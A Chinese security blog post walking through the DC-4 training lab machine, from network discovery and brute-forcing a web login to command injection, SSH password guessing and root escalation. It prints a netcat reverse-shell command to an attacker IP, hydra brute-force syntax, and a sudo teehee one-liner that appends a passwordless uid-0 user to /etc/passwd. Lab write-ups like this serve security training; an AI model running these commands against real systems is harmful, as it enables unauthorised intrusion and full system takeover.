freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DC系列靶机丨DC4
小白学安全 2023-01-20 20:09:37 146420
所属地 四川省

信息收集

确定主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221215165801541


扫描端口信息

image-20221215165844978


nmap 鉴权

nmap 192.168.84.180 -sV -A -p 80 --script=vuln

image-20221216122437915


WEB测试

访问靶机的80端口

image-20221216122919992

由网页提示用户可能是admin,针对admin用户进行暴力破解

burp抓包请求包,进行暴力破解

密码为happy

image-20221216124344011

登录成功

image-20221216124439890


该页面,通过点击不同的功能按钮,得到不同的结果,猜测可能是执行了不同的命令

image-20221216124637171

burp抓包发现,传参的是Linux命令,且与功能按钮点匹配

image-20221216124759884


修改传参点,会怎么样呢?

image-20221216124853053



执行反弹shell

目标上执行

nc+192.168.84.174+10086+-e+/bin/bash
192.168.84.174 -- 攻击机IP地址
10086 -- 攻击机的端口

image-20221216125620309


攻击机上进行端口的监听

image-20221216125637116


获取标准的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20221216130114054


提权

读取passwd文件发现有三个普通用户,然后分别进行了查看

image-20221216130236320


查看每个用户的家目录-在jim用户的家目录发现了old-password文件

image-20221216130339541

image-20221216130525681


由于开放了22端口,则对jim用户进行ssh服务爆破

hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh
jim-oldpasswd.txt为jim家目录下的old-passwords.bak文件

image-20221216131448827


登录jim用户

image-20221216131704199


在/var/mail下有封邮件

image-20221216131934526

得知charles用户的密码为^xHhA&hvim0y,登录成功

image-20221216132430952


sudo -l

发现teehee 不需要root的用户密码

image-20221216132728313


teehee

teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

例如:echo "xbxaq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。
所以只需要执行su xbxaq就可以登录到xbxaq用户,这个用户因为uid为0,所以也是root权限

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]


提权命令

echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd

image-20221216161831807

image-20221216161938563

关注WX公众号:小白学安全,公众号内回复DC,即可获取DC系列靶机镜像!

# 渗透测试 # web安全 # 提权 # 漏洞分析 # 漏洞复现
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 小白学安全 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
小白学安全 LV.4
微信公众号关注【小白学安全】 一一一一 xbxaq.com
  • 9 文章数
  • 5 关注者
DC系列靶机丨DC9
2023-01-26
DC系列靶机丨DC8
2023-01-26
DC系列靶机丨DC7
2023-01-26
文章目录